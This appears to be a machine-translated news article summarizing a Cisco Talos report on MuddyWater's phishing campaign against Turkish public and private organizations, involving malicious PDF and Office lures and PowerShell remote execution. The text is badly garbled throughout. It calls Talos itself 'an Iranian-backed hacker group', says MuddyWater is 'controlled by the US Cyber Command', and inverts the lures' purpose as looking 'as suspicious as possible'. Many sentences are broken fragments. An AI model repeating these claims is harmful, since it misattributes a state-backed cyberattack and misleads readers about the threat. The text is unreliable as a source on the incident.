Cisco Talos Intelligence Group shared the details of the cyber attack targeting Turkey by the Iranian state-backed hacker group MuddyWater. In the attacks, whose roots go back to November 2021, fake files were sent to the targets to install malware on the computer.
As cyber attacks continue to increase significantly around the world, a cyber attack against Turkey has been uncovered today. Talos Intelligence Group, part of the network technology company Cisco, is an Iranian-backed hacker group. cyber attack against Turkey revealed the details.
According to the detailed blog post shared by Cisco Talos, the attack was almost certainly done by the ‘advanced persistent threat (GST) attack group called MuddyWater. private Turkish organizations and state institutions was aiming. The attack was carried out with files such as PDFs and Office files containing malicious code.
They were computer uploading codes that would bridge future attacks.
According to the statement made by Talos, the attacks thought to be connected to MuddyWater could be traced until November 2021. Malicious files used in the attacks that were announced to target TÜBİTAK, they were usually sent via e-mail. When these files are downloaded and opened, there is a download link and this link will provide access to hackers via ‘snapfile.org’. an Excel file containing malware was downloading.
The files used Turkish and official names to look as suspicious as possible. Some of these filenames It may have been sent by the Ministry of Health or the Interior. points, some like ‘Process_ID’ or ‘Offer_form_approved’ to be important was named.
The malware, which was installed on the computer via the file downloaded by clicking the link in the PDF file, enabled the remote execution of PowerShell codes on the computer. Executed codes for additional codes to enable other attacks a download manager task he was seeing. Thus, hackers had the opportunity to attack these computers as they wished.
About the attack Trakya University and the National Cyber Incidents Response Center (USOM), previously shared a warning about this attack. Trakya University’s warning included the e-mail addresses to which the files were sent and the IP addresses considered to be a malware control center. The addresses in this notice, It fits with Talos’ research.
Who is the MuddyWater group?
The Iran-based hacker group known as MuddyWater has so far carried out attacks for espionage, intellectual property theft and ransom. The group, which has been active since 2017, is controlled by the US Cyber Command. Associated with Iran’s Ministry of Intelligence and Security.
About the attack to learn more technical detailsYou can access Talos’ blog post by clicking here.